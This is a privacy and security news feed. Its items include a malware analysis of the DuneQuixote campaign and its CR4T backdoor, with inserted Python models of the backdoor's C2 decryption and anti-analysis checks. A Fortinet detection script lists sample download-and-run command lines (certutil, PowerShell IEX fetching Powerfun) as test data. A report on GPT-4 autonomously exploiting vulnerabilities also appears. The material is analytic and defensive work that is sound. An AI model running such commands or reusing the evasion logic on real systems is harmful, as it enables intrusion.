🍀 ThePrivacyPost is a service account run directly by the Poliverso administrators. It publishes news from various sites, blogs and fediverse accounts, along with some original content.
🩸 If you find this service useful, consider donating to Poliverso via Ko-Fi ☕ or LiberaPay 💳.



Early CD Player Teardown
https://poliverso.org/display/0477a01e-38177bc1-9f7f56b63a7be2af

While CD players are nothing new today, they were the height of high-tech in the early 1980s. [w1ngsfly] shows us the inside of a Phase Linear 9500 player from 1983. Not only does it have many components, but it is also mechanically unusual.

The CD loads into a toaster-like slot and even pops out like a piece of toast. The tracking mechanism is quite complex, and there’s something that looks suspiciously like a dial string from an old slide rule tuner radio. Apparently, the unit was made by Kyocera and is internally similar to a Kyocera DA-01.

There’s a “head position” indicator that is actually just an LED connected to the tracking mechanism. The front panel controls look great but also allow you to control the head position exactly. As [w1ngsfly] mentions, it is almost like moving a turntable’s tonearm where you can drop it anywhere you want.

If we recall, they were about $600 to $1,000 new. If Phase Linear doesn’t ring a bell, they were well known in their day. Founded by [Bob Carver] and [Steve Johnston], the company was bought first by Pioneer and later by Jensen, before the introduction of the 9500. [Bob] would go on to found Carver Corporation. You can find plenty of history about the company online.

We’ve seen CD players that look older. These days, CD drives are cheap and they are easy enough to control.

Video: https://www.youtube.com/watch?v=Y520YHf3f0M




Robots Without Prying Eyes: The New Camera That Safeguards Privacy
https://poliverso.org/display/0477a01e-1a6d0bc6-f681092c6751395a

Australian scientists have developed a new type of robot camera that preserves privacy by processing and distorting visual information before it is digitized, to the point that the images become unrecognizable.

The research, developed jointly by the University of Sydney and the Queensland University of Technology, aims to improve privacy in an era in which homes and workplaces are increasingly equipped with smart devices, such as robot vacuum cleaners and delivery drones, that constantly record video and photographs of their surroundings.

The distorted images can still be used by robots to carry out their functions, but they do not contain enough information to violate privacy. Adam Taras, one of the study’s authors, stresses that smart devices should not become surveillance tools.

The distinctive feature of the proposed approach is that image processing happens in the optical and analog stages of the camera’s electronics, so the images are already protected from attackers before they are ever digitized. The threat model is a compromise of the digital side (firmware, host software, network): by moving the privacy boundary in front of the analog-to-digital conversion, the design ensures that no recoverable image exists anywhere in the digital pipeline to be stolen.

Such cameras could be used in a variety of settings where privacy and security matter, including warehouses, hospitals, factories, schools and airports. The researchers also intend to build physical prototypes of the cameras to demonstrate how the technology works in practice.

Professor Niko Sünderhauf, deputy director at the Queensland University of Technology, said he hopes the new sensor design will be adopted by industry and find widespread use.

The study, published in the Journal of Responsible Technology, stresses the importance of developing robotic technologies that respond to users’ legitimate privacy concerns.

The article “Robots Without Prying Eyes: The New Camera That Safeguards Privacy” originally appeared on il blog della sicurezza informatica.




DuneQuixote campaign targets Middle Eastern entities with “CR4T” malware
https://poliverso.org/display/0477a01e-ad8ddbdd-d8140a152302b9f3

Introduction


In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it “DuneQuixote”, and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions (regular droppers and tampered installer files for the legitimate tool “Total Commander”), carried malicious code to download an additional payload in the form of a backdoor we call “CR4T”. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.

The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.

Initial dropper


The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.

Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.

Figure: Useless function calls

The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.

Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.

Figure: String decryption algorithm

Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:

  • retrieving the offset of the Process Environment Block (PEB);
  • locating the export table offset of kernel32.dll;
  • identifying the offset for the GetProcAddress function.

In the process of obtaining the PEB offset, the malware first decrypts the constant 0x60, which is the offset of the PEB pointer within the 64-bit TEB (normally read as gs:[0x60]) and is used to locate the PEB64 structure. This is notable because malicious samples or shellcode using this technique usually keep that constant hardcoded in plain text, where it is an easy signature.

Figure: Getting PEB structure offset

Next, the malware begins to populate the previously created structure with the offsets of all required functions.

The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.

Figure: C2 decryption algorithm

Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.

Once the payload is downloaded into the process’s memory, the dropper performs a verification check for the “M” (0x4D in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.
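The following is an added example written for this page, not code from the report or from the dropper. It models the filename-bound C2 decryption described above: the key is MD5 over the executed filename concatenated with a poem snippet. The report does not name the cipher that key feeds, so the repeating-key XOR used here is an assumption, chosen only to show the property that matters to an analyst: rename the sample before detonation and the C2 string does not decrypt. The poem snippet, filename and URL are constructed placeholders, and the MZ checks model the single-byte check described above next to the stricter check an analyst would apply.

```python
# Added example, not DuneQuixote code. Key = MD5(filename || poem snippet), as
# described in the report; the XOR cipher fed by that key is an ASSUMPTION.
import hashlib

# Constructed placeholders; none of these strings comes from a real sample.
POEM_SNIPPET = "En un lugar de la Mancha, de cuyo nombre no quiero acordarme"
ORIGINAL_NAME = "update.exe"
C2_URL = "https://c2.example.invalid/payload"


def derive_key(filename: str, poem: str) -> bytes:
    """MD5 over filename concatenated with the poem snippet (UTF-8 assumed)."""
    return hashlib.md5((filename + poem).encode("utf-8")).digest()


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR with the 16-byte digest (assumed cipher; symmetric)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_encrypted_c2(filename: str, poem: str, url: str) -> bytes:
    """What a builder would embed in a dropper meant to run under `filename`."""
    return xor_stream(url.encode("utf-8"), derive_key(filename, poem))


def decrypt_c2(blob: bytes, running_filename: str, poem: str) -> bytes:
    """What the dropper computes at runtime from the name it was launched under."""
    return xor_stream(blob, derive_key(running_filename, poem))


def looks_like_mz(payload: bytes) -> bool:
    """The dropper's check as described: only the first byte, 'M' (0x4D)."""
    return len(payload) >= 1 and payload[0] == 0x4D


def looks_like_mz_strict(payload: bytes) -> bool:
    """Stricter check an analyst would use: the full 'MZ' signature."""
    return payload[:2] == b"MZ"


if __name__ == "__main__":
    blob = build_encrypted_c2(ORIGINAL_NAME, POEM_SNIPPET, C2_URL)
    print("original name :", decrypt_c2(blob, ORIGINAL_NAME, POEM_SNIPPET))
    print("renamed sample:", decrypt_c2(blob, "sample.bin", POEM_SNIPPET))
```

Because any change to the filename changes every byte of the MD5 digest, a sandbox that renames submissions to their hash (a common default) produces garbage instead of the C2 string; detonate such samples under the filename they were delivered with, or brute-force plausible names against the blob offline.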

Total Commander installer dropper


The Total Commander installer dropper is created to mimic a legitimate Total Commander software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (.textbss) and a modified entry point. This tampering results in invalidating the official digital signature of the Total Commander installer.

The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the Spanish poem strings and the decoy function calls. It also implements a series of anti-analysis checks that prevent any connection to C2 resources if any of the following conditions is true:

  • a debugger is present in the system;
  • known research or monitoring tools are among the running processes;
  • the explorer.exe process has more than two instances;
  • any of the following processes are running:
    • “python.exe”
    • “taskmgr.exe”
    • “procmon.exe”
    • “resmon.exe”
    • “eventvwr.exe”
    • “process_hacker.exe”
  • less than 8 GB of RAM is available;
  • the cursor position does not change over a certain timeframe;
  • disk capacity is less than 40 GB.

If any of these checks trips, the check routine returns 1. That return value feeds into the decryption of the C2 server address: it causes the first “h” of the C2 URL (“https”) to be dropped, turning it into “ttps”. The mangled URL cannot be connected to, so no connection to the real C2 is ever attempted from an analysis environment.
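As an added example (not the dropper’s code), the gate above written the way an analyst would use it: feed it a snapshot of a sandbox VM and it reports which check would stop the sample from ever contacting its C2, then applies the URL mangling. The snapshot format (a plain dict) and the two sample snapshots are constructed for this example; the thresholds and process names are the ones given in the report, and the “research tools” condition is modelled as a flag because the report does not list those tools.

```python
# Added example, not DuneQuixote code: a rules model of the Total Commander
# dropper's anti-analysis gate and the "https" -> "ttps" mangling it drives.

BLOCKLISTED_PROCS = {
    "python.exe", "taskmgr.exe", "procmon.exe",
    "resmon.exe", "eventvwr.exe", "process_hacker.exe",
}
MIN_RAM_GB = 8
MIN_DISK_GB = 40


def anti_analysis_checks(host: dict) -> tuple[int, list[str]]:
    """Return (rc, reasons): rc is 1 when any check trips, 0 otherwise."""
    reasons = []
    procs = [p.lower() for p in host.get("processes", [])]
    if host.get("debugger_present"):
        reasons.append("debugger present")
    # Stand-in flag: the report does not name the research/monitoring tools.
    if host.get("research_tools_running"):
        reasons.append("known research/monitoring tool running")
    if procs.count("explorer.exe") > 2:
        reasons.append("more than two explorer.exe instances")
    hits = sorted(BLOCKLISTED_PROCS.intersection(procs))
    if hits:
        reasons.append("blocklisted process: " + ", ".join(hits))
    if host.get("ram_gb", 0) < MIN_RAM_GB:
        reasons.append(f"less than {MIN_RAM_GB} GB RAM")
    samples = host.get("cursor_samples", [])
    if len(samples) >= 2 and len(set(samples)) == 1:
        reasons.append("cursor position never changed during the wait")
    if host.get("disk_gb", 0) < MIN_DISK_GB:
        reasons.append(f"disk smaller than {MIN_DISK_GB} GB")
    return (1 if reasons else 0), reasons


def c2_url_after_gate(url: str, rc: int) -> str:
    """rc == 1 drops the leading character: 'https://...' becomes 'ttps://...',
    a scheme no HTTP client will act on, so no beacon is ever sent."""
    return url[1:] if rc == 1 else url


# Constructed snapshots: a default analysis VM and one tuned to pass the gate.
DEFAULT_SANDBOX = {
    "debugger_present": False, "research_tools_running": False,
    "processes": ["explorer.exe", "procmon.exe", "python.exe"],
    "ram_gb": 4, "disk_gb": 60,
    "cursor_samples": [(512, 384), (512, 384), (512, 384)],
}
TUNED_SANDBOX = {
    "debugger_present": False, "research_tools_running": False,
    "processes": ["explorer.exe", "svchost.exe"],
    "ram_gb": 16, "disk_gb": 120,
    "cursor_samples": [(512, 384), (530, 390), (541, 402)],
}

if __name__ == "__main__":
    for name, snap in (("default", DEFAULT_SANDBOX), ("tuned", TUNED_SANDBOX)):
        rc, why = anti_analysis_checks(snap)
        print(name, rc, why, c2_url_after_gate("https://c2.example.invalid/", rc))
```

The reasons list doubles as a tuning checklist: a default 4 GB VM with Procmon open and an idle mouse fails on three counts, and the sample will look inert rather than crash, which is exactly what makes this gate easy to miss in automated triage.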

Memory-only CR4T implant


The “CR4T” implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim’s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:
"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"
That’s why we dubbed it “CR4T”.

Upon execution by the dropper, the implant initiates a cmd.exe process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value “TroubleShooter” as the user agent name for requests to the C2.

Figure: User-agent string

After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim’s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.

After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is a one-byte value, each value mapped to a specific action on the infected system. These single-character commands would make more sense for an English-speaking developer or operator than a Spanish-speaking one, e.g. “D” for Download and “U” for Upload (where a Spanish speaker might use “Cargar”).

Command        Functionality
‘C’ (0x43)     Provide access to the command line interface via a named pipe.
‘D’ (0x44)     Download file from the C2
‘U’ (0x55)     Upload file to the C2
‘S’ (0x53)     Sleep
‘R’ (0x52)     Exit process
‘T’ (0x57)     Write to a file (T here possibly stands for a file-write task)

Note that the last row is internally inconsistent: 0x57 is ASCII ‘W’, while ‘T’ is 0x54. One of the two is a transcription slip in the original table, so when writing detections or an emulator, match on the byte value actually observed in the sample rather than on the letter.

During our investigation, we discovered evidence of a PowerShell file that had been created using the “T” command:
"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"
The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with “User_Feed_Sync“. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.

Memory-only Golang CR4T implant


We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:
"C:/Users/user/Desktop/code/Cr4tInst/main.go"
This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim’s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang Go-ole library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.

Figure: CR4T using go-ole library

The malware is also capable of achieving persistence by utilizing the COM objects hijacking technique. And finally, it uses the Telegram API for C2 communications, implementing the public Golang Telegram API bindings. All the interactions are similar to the C/C++ version.

Infrastructure


The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.

Domain              IP                  First seen          ASN
commonline[.]space  135.148.113[.]161   2023-12-16 23:20    16276
userfeedsync[.]com  104.36.229[.]249    2024-01-10 07:27    395092
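An added hunting example, not code from the report: one pass over log lines for three observables the report gives, the “TroubleShooter” user agent of the C/C++ implant, the two C2 domains (including their subdomains), and scheduled tasks named User_Feed_Sync* that the Golang implant is believed to create. Both log formats below are constructed for this example (the task events are modelled loosely on the fields of Windows Security event 4698); map the field names onto your own proxy and event schema.

```python
# Added example; not code from the report. Hunts constructed proxy lines and
# task-creation events for the CR4T user agent, C2 domains and task names.
import re
from urllib.parse import urlparse

C2_DOMAINS = {"commonline.space", "userfeedsync.com"}
IMPLANT_UA = "TroubleShooter"
TASK_PREFIX = "User_Feed_Sync"

# Constructed proxy lines: "<ts> <client> <method> <url> ua=<user-agent>"
PROXY_LOGS = [
    "2024-01-11T08:02:10Z 10.0.0.21 GET https://telemetry.commonline.space/u ua=TroubleShooter",
    "2024-01-11T08:02:12Z 10.0.0.22 GET https://www.example.org/index.html ua=Mozilla/5.0",
    "2024-01-11T08:03:40Z 10.0.0.23 POST https://cdn.example.net/api ua=TroubleShooter",
    "2024-01-11T08:04:05Z 10.0.0.24 GET https://notcommonline.space/ ua=Mozilla/5.0",
]
# Constructed task-creation events, key=value fields modelled on event 4698
TASK_EVENTS = [
    "EventID=4698 Computer=WS-21 SubjectUserName=alice TaskName=\\User_Feed_Sync_3f2a",
    "EventID=4698 Computer=WS-22 SubjectUserName=bob TaskName=\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
]

PROXY_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) ua=(?P<ua>.*)$")


def domain_matches(host: str) -> bool:
    """True for the C2 domain itself or any subdomain of it (not look-alikes)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def check_proxy_line(line: str) -> list[str]:
    m = PROXY_RE.match(line)
    if not m:
        return []
    reasons = []
    host = urlparse(m["url"]).hostname or ""
    if domain_matches(host):
        reasons.append(f"C2 domain {host}")
    if m["ua"].strip() == IMPLANT_UA:
        reasons.append("CR4T user agent")
    return reasons


def check_task_event(line: str) -> list[str]:
    fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
    if fields.get("EventID") != "4698":
        return []
    name = fields.get("TaskName", "").lstrip("\\")
    return [f"task {name}"] if name.startswith(TASK_PREFIX) else []


def hunt(proxy_lines, task_lines) -> list[tuple[str, list[str]]]:
    """Return every line that matched, with the reasons it matched."""
    hits = []
    for line in proxy_lines:
        r = check_proxy_line(line)
        if r:
            hits.append((line, r))
    for line in task_lines:
        r = check_task_event(line)
        if r:
            hits.append((line, r))
    return hits


if __name__ == "__main__":
    for line, why in hunt(PROXY_LOGS, TASK_EVENTS):
        print(why, "<-", line)
```

The user-agent match is kept separate from the domain match on purpose: the report says the payload is only served when the right user agent is presented, so an unfamiliar UA to a host that is not yet on the blocklist is worth a look on its own, while the domain check catches the telemetry.* and other subdomains listed in the IoCs without also flagging look-alike registrations.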

Victims


We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. Other sources we suspect to be VPN exit nodes geo-located in South Korea, Luxembourg, Japan, Canada, Netherlands and the US.

Conclusions


The “DuneQuixote” campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.

Indicators of Compromise


DuneQuixote Droppers
3aaf7f7f0a42a1cf0a0f6c61511978d7
5759acc816274d38407038c091e56a5c
606fdee74ad70f76618007d299adb0a4
5a04d9067b8cb6bcb916b59dcf53bed3
48c8e8cc189eef04a55ecb021f9e6111
7b9e85afa89670f46f884bb3bce262b0
4f29f977e786b2f7f483b47840b9c19d
9d20cc7a02121b515fd8f16b576624ef
4324cb72875d8a62a210690221cdc3f9
3cc77c18b4d1629b7658afbf4175222c
6cfec4bdcbcf7f99535ee61a0ebae5dc
c70763510953149fb33d06bef160821c
f3988b8aaaa8c6a9ec407cf5854b0e3b
cf4bef8537c6397ba07de7629735eb4e
1bba771b9a32f0aada6eaee64643673a
72c4d9bc1b59da634949c555b2a594b1
cc05c7bef5cff67bc74fda2fc96ddf7b
0fdbe82d2c8d52ac912d698bb8b25abc
9b991229fe1f5d8ec6543b1e5ae9beb4
5e85dc7c6969ce2270a06184a8c8e1da
71a8b4b8d9861bf9ac6bd4b0a60c3366
828335d067b27444198365fac30aa6be
84ae9222c86290bf585851191007ba23
450e589680e812ffb732f7e889676385
56d5589e0d6413575381b1f3c96aa245
258b7f20db8b927087d74a9d6214919b
a4011d2e4d3d9f9fe210448dd19c9d9a
b0e19a9fd168af2f7f6cf997992b1809
0d740972c3dff09c13a5193d19423da1
a0802a787537de1811a81d9182be9e7c
5200fa68b6d40bb60d4f097b895516f0
abf16e31deb669017e10e2cb8cc144c8
f151be4e882352ec42a336ca6bff7e3d
f1b6aa55ba3bb645d3fde78abda984f3
00130e1e7d628c8b5e2f9904ca959cd7
fb2b916e44abddd943015787f6a8dc35
996c4f78a13a8831742e86c052f19c20
91472c23ef5e8b0f8dda5fa9ae9afa94
135abd6f35721298cc656a29492be255
db786b773cd75483a122b72fdc392af6

Domains and IPs
Commonline[.]space
g1sea23g.commonline[.]space
tg1sea23g.commonline[.]space
telemetry.commonline[.]space
e1awq1lp.commonline[.]space
mc.commonline[.]space
userfeedsync[.]com
Service.userfeedsync[.]com
telemetry.userfeedsync[.]com


https://securelist.com/dunequixote/112425/




GPT-4 Becomes a Hacker! It Exploits 1-day Bugs in 87% of Cases
https://poliverso.org/display/0477a01e-b346fc25-6cb66a8ac1a96acb

A study conducted at the University of Illinois (UIUC) has revealed a new capability of GPT-4 combined with automation tools: the ability to exploit one-day vulnerabilities by reading their descriptions.

The effectiveness of this approach reached a notable 87%. In a comment to The Register, one of the study’s co-authors pointed out that an AI-based penetration-testing assistant would be extremely cheap, at a cost of just $8.80 per exploit, almost three times less than the half hour of specialist labor needed to produce one.

To build it, an agent based on GPT-4 was created using the LangChain framework, integrated with the ReAct automation module. The code, 91 lines long with a 1,056-token prompt, is available on request only, since OpenAI asked the authors not to release it publicly.

The test was run on 15 common vulnerabilities affecting websites, containers and Python packages, more than half of them rated critical or high severity. GPT-4 failed in two specific cases, however: CVE-2024-25640 (XSS in the Iris platform) and CVE-2023-51653 (RCE in the Hertzbeat monitoring system). Iris’s complex interface and the presence of descriptions in Chinese hindered the agent.

Interestingly, while analyzing the vulnerability descriptions, the AI tool autonomously followed links to obtain further information. Even though 11 of the targets were not part of the model’s training data, overall effectiveness was still remarkable, at 82%.

The university researchers also evaluated GPT-3.5 and other open-source large language models (LLMs) as part of the assessment.

The article “GPT-4 Becomes a Hacker! It Exploits 1-day Bugs in 87% of Cases” originally appeared on il blog della sicurezza informatica.




Raspberry Pi Scanner Digitizes On the Cheap
https://poliverso.org/display/0477a01e-3a44a403-70e85df8b2026cbe

A red 3D-printed Raspberry Pi-based document scanner

It’s pretty important in 2024 to be able to digitize documents quickly and easily without necessarily having to stop by the local library or buy an all-in-one printer. While there are plenty of commercial solutions out there, [Caelestis Cosplay] has created a simple document scanner that takes documents, as [Caelestis Cosplay] puts it, from papers to pixels.

The build is probably what you’re expecting — it’s essentially a Raspberry Pi (in this case a 4B), a V2 Pi camera, and a handful of custom 3D-printed parts. [Caelestis Cosplay] says they had never designed anything for printing before, and we think it looks great. There’s also a buzzer to indicate that the scan is starting (one beep) or has completed (two beeps), a ‘ready’ indicator, and a ‘working’ indicator.

Everything you’d need to build your own is available over on Instructables, including document scanner and controller scripts. Be sure to check it out in action after the break, and see it quickly scan in a document and put it on a thumb drive.

Looking for a 3D scanner? Check out the OpenScan project.

Video: https://www.youtube.com/watch?v=im4OoNOdGSw




Fortinet SQL Injection Vulnerability Exploited by a Dangerous Malware Campaign
https://poliverso.org/display/0477a01e-cbbed949-8c7853c692fd7a5a

Forescout has discovered a new campaign exploiting a vulnerability in Fortinet FortiClient EMS devices to spread malware.

The SQL injection vulnerability CVE-2023-48788 (CVSS score 9.8) allows an unauthenticated attacker to execute code via specially crafted queries. The attack requires no user interaction and is fairly simple to carry out.

Forescout is tracking the campaign under the codename Connect:fun because of its post-compromise use of ScreenConnect and Powerfun. The attack targeted an unnamed media company whose vulnerable FortiClient EMS device was exposed online.

Recall that a PoC exploit for this vulnerability was published online on March 21. On March 25, an exploit was used to run PowerShell code that downloaded the Metasploit Powerfun script and initiated a reverse connection to a different IP address.

It was also discovered that SQL queries were used to download ScreenConnect from a remote domain via the certutil utility, after which the program was installed and established communication with the management server.

Forescout notes that the attackers, active since at least 2022, specialize in attacks on Fortinet devices and use Vietnamese and German in their infrastructure. The activity points to a manual component in the attacks, evidenced by numerous failed attempts to download and install programs and by long pauses between attempts. This confirms a targeted campaign rather than a mass automated attack.

Organizations are urged to install the patches released by Fortinet to mitigate the threat, monitor for suspicious traffic, and use firewalls to block potentially malicious requests.
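An added example, not Forescout’s or Fortinet’s code: the account above says injected SQL was used to fetch ScreenConnect with certutil and to run PowerShell that pulled Powerfun, which means the database engine ended up spawning shells. The script scores process-creation events for that pattern so it can be run over endpoint telemetry from an EMS host. Assumptions: the EMS back end is Microsoft SQL Server (parent image sqlservr.exe), the event line format is the constructed one shown, and the URLs, IPs and paths are placeholders rather than indicators from the campaign.

```python
# Added example; not Forescout's or Fortinet's code. Scores constructed
# process-creation events for "database engine spawns a shell that downloads".
import re

DB_PARENTS = {"sqlservr.exe"}          # ASSUMPTION: EMS database is MS SQL Server
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}
PATTERNS = [
    (re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+https?://", re.I),
     "certutil download"),
    (re.compile(r"powerfun", re.I), "Powerfun script reference"),
    (re.compile(r"screenconnect", re.I), "ScreenConnect reference"),
    (re.compile(r"\b(iex|invoke-expression)\b.*(downloadstring|webclient|invoke-webrequest|iwr)", re.I),
     "PowerShell download-and-execute"),
]

# Constructed events: "parent=<image> image=<image> cmdline=<command line>"
EVENTS = [
    "parent=sqlservr.exe image=cmd.exe cmdline=cmd.exe /c certutil -urlcache -split -f "
    "http://203.0.113.5/ScreenConnect.ClientSetup.msi C:\\Windows\\Temp\\sc.msi",
    "parent=sqlservr.exe image=powershell.exe cmdline=powershell -nop -w hidden -c "
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/powerfun.ps1')",
    "parent=explorer.exe image=powershell.exe cmdline=powershell -c Get-Process",
    "parent=sqlservr.exe image=cmd.exe cmdline=cmd.exe /c msiexec /i C:\\Windows\\Temp\\sc.msi /qn",
]

EVENT_RE = re.compile(r"^parent=(\S+) image=(\S+) cmdline=(.*)$")


def parse_event(line: str):
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"parent": m[1].lower(), "image": m[2].lower(), "cmdline": m[3]}


def score_event(evt: dict) -> tuple[int, list[str]]:
    """One point per matched indicator; the parent/child relation is the
    strongest one because a database engine has no business spawning shells."""
    reasons = []
    if evt["parent"] in DB_PARENTS and evt["image"] in SHELLS:
        reasons.append("database engine spawned a shell")
    for rx, label in PATTERNS:
        if rx.search(evt["cmdline"]):
            reasons.append(label)
    return len(reasons), reasons


def triage(lines) -> list[tuple[int, list[str], str]]:
    """Parse, score and rank events; events that match nothing are dropped."""
    out = []
    for line in lines:
        evt = parse_event(line)
        if evt is None:
            continue
        score, why = score_event(evt)
        if score:
            out.append((score, why, line))
    return sorted(out, key=lambda t: -t[0])


if __name__ == "__main__":
    for score, why, line in triage(EVENTS):
        print(score, why, "<-", line[:80])
```

The last constructed event (msiexec run from the database engine) matches only on the parent/child relation, which is the point: the indicator that survives a change of tooling is not the certutil or ScreenConnect string but sqlservr.exe having a shell as a child at all, so alert on that relation first and treat the string matches as enrichment.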

The article “Fortinet SQL Injection Vulnerability Exploited by a Dangerous Malware Campaign” originally appeared on il blog della sicurezza informatica.




Unraveling The Secrets of Apple’s Mysterious Fisheye Format
https://poliverso.org/display/0477a01e-991177e8-b4b9f4c1419127e3

Apple has developed a proprietary — even mysterious — “fisheye” projection format used for their immersive videos, such as those played back by the Apple Vision Pro. What’s the mystery? The fact that they stream their immersive content in this format but have provided no elaboration, no details, and no method for anyone else to produce or play back this format. It’s a completely undocumented format and Apple’s silence is deafening when it comes to requests for, well, anything to do with it whatsoever.

Probably those details are eventually forthcoming, but [Mike Swanson] isn’t satisfied to wait. He’s done his own digging into the format and while he hasn’t figured it out completely, he has learned quite a bit and written it all up on a blog post. Apple’s immersive videos have a lot in common with VR180 type videos, but under the hood there is more going on. Apple’s stream is DRM-protected, but there’s an unencrypted intro clip with logo that is streamed in the clear, and that’s what [Mike] has been focusing on.
Figure: Most “fisheye” formats are mapped onto square frames in a way similar to what’s seen here, but this is not what Apple is doing.
[Mike] has been able to determine that the format definitely differs from existing fisheye formats recorded by immersive cameras. First of all, the content is rotated 45 degrees. This spreads the horizon of the video across the diagonal, maximizing the number of pixels available in that direction (a trick that calls to mind the heads in home video recorders being tilted to increase the area of tape it can “see” beyond the physical width of the tape itself.) Doing this also spreads the center-vertical axis of the content across the other diagonal, with the same effect.

There’s more to it than just a 45-degree rotation, however. The rest most closely resembles radial stretching, a form of disc-to-square mapping. It’s close, but [Mike] can’t quite find a complete match for what exactly Apple is doing. Probably we’ll all learn more soon, but for now Apple isn’t saying much.
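As an added example (not from [Mike Swanson]’s post and not Apple’s code), the candidate model described above in working form: the circular fisheye image is rotated 45 degrees so the horizon runs corner to corner, then a radial-stretch disc-to-square mapping fills the square frame. The stretch implemented here is the textbook radial stretching (same angle, radius scaled by r / max(|u|, |v|)), which the post says is close to, but not exactly, what Apple does; coordinates are normalized so the fisheye circle is the unit disc and the frame is the square [-1, 1] × [-1, 1].

```python
# Added example, not Apple's or Mike Swanson's code: rotate-45-then-radial-stretch
# candidate mapping between a circular fisheye image and a square frame.
import math


def rotate(x: float, y: float, degrees: float) -> tuple[float, float]:
    a = math.radians(degrees)
    return (x * math.cos(a) - y * math.sin(a), x * math.sin(a) + y * math.cos(a))


def disc_to_square(u: float, v: float) -> tuple[float, float]:
    """Radial stretch: keep the angle, scale the radius so the rim of the unit
    disc lands on the edge of the unit square (factor r / max(|u|, |v|))."""
    m = max(abs(u), abs(v))
    if m == 0.0:
        return (0.0, 0.0)
    s = math.hypot(u, v) / m
    return (u * s, v * s)


def square_to_disc(x: float, y: float) -> tuple[float, float]:
    """Inverse of disc_to_square (factor max(|x|, |y|) / r)."""
    r = math.hypot(x, y)
    if r == 0.0:
        return (0.0, 0.0)
    s = max(abs(x), abs(y)) / r
    return (x * s, y * s)


def fisheye_to_frame(u: float, v: float) -> tuple[float, float]:
    """Fisheye (unit disc) -> stored frame: rotate 45 degrees, then stretch."""
    return disc_to_square(*rotate(u, v, 45.0))


def frame_to_fisheye(x: float, y: float) -> tuple[float, float]:
    """Stored frame -> fisheye: undo the stretch, then rotate back."""
    return rotate(*square_to_disc(x, y), -45.0)


def horizon_pixels(frame_side: int) -> float:
    """Pixels along the horizon once it lies on the diagonal: side * sqrt(2),
    versus side pixels for an unrotated layout."""
    return frame_side * math.sqrt(2.0)


if __name__ == "__main__":
    # The right end of the horizon (1, 0) on the fisheye ends up in a corner.
    print(fisheye_to_frame(1.0, 0.0), frame_to_fisheye(1.0, 1.0))
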